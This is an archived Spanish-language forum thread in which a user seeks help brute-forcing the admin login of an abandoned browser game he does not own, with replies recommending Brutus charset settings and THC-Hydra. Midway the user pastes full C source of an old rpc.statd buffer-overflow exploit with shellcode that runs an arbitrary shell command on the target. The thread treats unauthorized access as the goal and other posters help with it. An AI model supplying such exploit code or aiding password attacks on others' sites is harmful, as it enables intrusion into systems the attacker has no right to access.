PDA

Ver la versión completa : Duda/problema con el brutus al intentar sacar el user/pass del admin de una web



VeNtRuE
12-09-2010, 04:31
Saludos peña.
He intentado sacar el password del administrador de un juego browser (o como se llamen, los de pagina web lol) con el brutus, pero se para a los pocos intentos, la web en cuestion esta dejada de la mano de dios desde hace un año, y lo mas seguro es que cierren el juego en breve, no tiene nadie del staff activo, vamos, que sudan de el (la ultima actualizacion fue hace mas de un año!) pero a mi me gusta, y para lo poco que le queda de vida me gustaria trastearlo un poco, el tema es que no tengo ni puñetera idea de como sacarle el password (tampoco estoy seguro de que el username sea el correcto lol) me he mirado el foro pero las guias del brutus no dicen nada de que se pare a los pocos intentos, he probado a usar los diccionarios que rulan por el foro para descargarse, y se para igualmente, en lo que seria el "informe" me salia el username como admin y los passwords letras sueltas en cada intento, no se en que meto la gamba. Si alguien tiene idea de lo que me falta seria la ostia! si quereis la direccion de la web o la ip de la misma os la paso cagando ostias lol asi a lo mejor sera mas facil para decirme como debo usar el brutus con ella, paso de ponerla y hacerles propaganda LOL.
Gracias de antemano gente!

Fruit
12-09-2010, 17:54
La mayoría de las webs (las que están bien hechas) te obligarán a resolver un CAPTCHA después de unos intentos fallidos, o si no, te bloquearán la dirección IP.

VeNtRuE
12-09-2010, 19:06
No tiene captcha, te sale la tipica pantalla donde te indica que el user/pass no es el correcto (he probado un user y un pass incorrecto unas 30 veces y sigue saliendo lo mismo, y el brutus se para con menos intentos)
Como esta en decadencia ni uso proxy ni nada, directamente y si cuela cuela, pero no tengo ni idea de por que no sigue intentandolo el programa, me da igual que tarde meses.
gracias por contestar tan rapido.

VeNtRuE
13-09-2010, 03:41
Edit:
Lo habia compilado mal, ahora he usado el cygwin pero me sale "acceso denegado" cuando intento compilarlo, el exploit es para C y es para bugffer overflow

hckr
14-09-2010, 01:31
la mayoria de los nuevos servidores bloquean la fuerza bruta. El brutus tiene una opcion de la fuerza bruta, el range. Determina el tipo de contraseñas. Con numeros y letras, con simbolos... Etc. Mira eso. Has encontrado un bug que explotar en la pagina? :D

VeNtRuE
14-09-2010, 03:17
*buffer no bugfer se me fue la olla. sigo sin poder compilar el exploit, me sale siempre el mensaje de "acceso denegado", y no tengo ni idea del porque, me he bajado todos los paquetes del cygwin (menudo coñazo lol) he comprobado que esten los necesarios, pero aun asi no me deja, me jhe bajado el dev c++ pero no tengo ni idea de si funcionara en el, a todo esto el exploit que me sale en la pagiina que te manda el SSS es este


#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/sm_inter.h>
#include <sys/socket.h>

#define BUFSIZE 1024
#define ADDRS 2+1+1+4
#define ADDRP 0x8045570;

/* up to ~ 150 characters, there must be three strings */
char *cmd[3]={"/bin/sh", "-c", "touch /tmp/blahblah"};

char asmcode[]="\xeb\x3c\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x f7\x83\xc7\x10\x89\x3e\x4f\x47\xfe\x07\x75\xfb\x47 \x89\x7e\x04\x4f\x47\xfe\x07\x75\xfb\x47\x89\x7e\x 08\x4f\x47\xfe\x07\x75\xfb\x89\x46\x0c\x50\x56\xff \x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x0


1\x07\x07\xe8\xbf\xff\xff\xff\x02\x02\x02\x02\x02\ x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02";
char nop[]="\x90";

char code[4096];

void usage(char *s) {
printf("Usage: %s host [cmd]\n", s);
exit(0);
}

main(int argc, char *argv[]) {
CLIENT *cl;
enum clnt_stat stat;
struct timeval tm;
struct mon monreq;
struct sm_stat_res monres;
struct hostent *hp;
struct sockaddr_in target;
int sd, i, noplen=strlen(nop);
char *ptr=code;

if (argc < 2)
usage(argv[0]);
if (argc == 3)
cmd[2]=argv[2];

for (i=0; i< sizeof(code); i++)
*ptr++=nop[i % noplen];

strcpy(&code[750], asmcode); /* XXX temp. */
ptr=code+strlen(code);
for (i=0; i<=strlen(cmd[0]); i++)
*ptr++=cmd[0][i]-1;
for (i=0; i<=strlen(cmd[1]); i++)
*ptr++=cmd[1][i]-1;
for (i=0; i<=strlen(cmd[2]); i++)
*ptr++=cmd[2][i]-1;
ptr=code+BUFSIZE-(ADDRS<<2);
for (i=0; i<ADDRS; i++, ptr+=4)
*(int *)ptr=ADDRP;
*ptr=0;

printf("strlen = %d\n", strlen(code));

memset(&monreq, 0, sizeof(monreq));
monreq.mon_id.my_id.my_name="localhost";
monreq.mon_id.my_id.my_prog=0;
monreq.mon_id.my_id.my_vers=0;
monreq.mon_id.my_id.my_proc=0;
monreq.mon_id.mon_name=code;

if ((hp=gethostbyname(argv[1])) == NULL) {
printf("Can't resolve %s\n", argv[1]);
exit(0);
}
target.sin_family=AF_INET;
target.sin_addr.s_addr=*(u_long *)hp->h_addr;
target.sin_port=0; /* ask portmap */
sd=RPC_ANYSOCK;

tm.tv_sec=10;
tm.tv_usec=0;
if ((cl=clntudp_create(&target, SM_PROG, SM_VERS, tm, &sd)) == NULL) {
clnt_pcreateerror("clnt_create");
exit(0);
}
stat=clnt_call(cl, SM_MON, xdr_mon, (char *)&monreq, xdr_sm_stat_res,
(char *)&monres, tm);
if (stat != RPC_SUCCESS)
clnt_perror(cl, "clnt_call");
else
printf("stat_res = %d.\n", monres.res_stat);
clnt_destroy(cl);
}

ni idea de si rulara o no lol

Fruit
14-09-2010, 23:48
http://freeworld.thc.org/thc-hydra/

VeNtRuE
15-09-2010, 00:44
me he bajado el hydra ese, pero no se como instalarlo o usarlo.


HOW TO USE
----------
Type "./configure", followed by "make" to compile hydra and then
"./hydra -h" to see the command line options.
You make also type "make install" to install hydra to /usr/local/bin.
Note that NO login/password file is included. Generate them yourself.
For Linux users, a GTK gui is available, try "./xhydra"

no se donde meterle esos comandos, en el ms2 no me los reconoce, he probado a hacerlo con el cygwin pero tampoco me deja


HOW TO COMPILE
--------------
Type "./configure" and then "make" and "make install".
If you have CYGWIN, you have to follow the instructions "./configure" prints
after running.
For PalmPilot, run "./configure-palm".
For ARM processor mobiles, run "./configure-arm".
esta es la parte que mas me interesaba pero me pasa exactamente lo mismo, soy incapaz de hacerlo funcionar lol

Fruit
16-09-2010, 12:43
Necesitas un compilador de cygwin o algo así. Nunca he compilado nada en Windows, no te puedo ayudar.

VeNtRuE
16-09-2010, 17:29
he solucionado el problema de acceso denegado, tenia que tocar la pestaña de seguridad (Para ver la ficha Seguridad en Opciones de carpeta,en la ficha Ver, bajo Configuración avanzada, desactive la casilla Utilizar uso compartido simple de archivos [recomendado].)
ahora me deja usar el gcc, pero me da error al usarlo (La CPU MTVDM ha encontrado una instrucción no permitida. CS:073b IP:21c6 OP:63 6c 61 64 6f Elija"Cerrar" para finalizar la aplicación)
Estoy por buscar directamente el exploit compilado por que al final me voy a volver loco.

Fruit
16-09-2010, 21:07
O instalar algún GNU/Linux, aunque sea en una máquina virtual.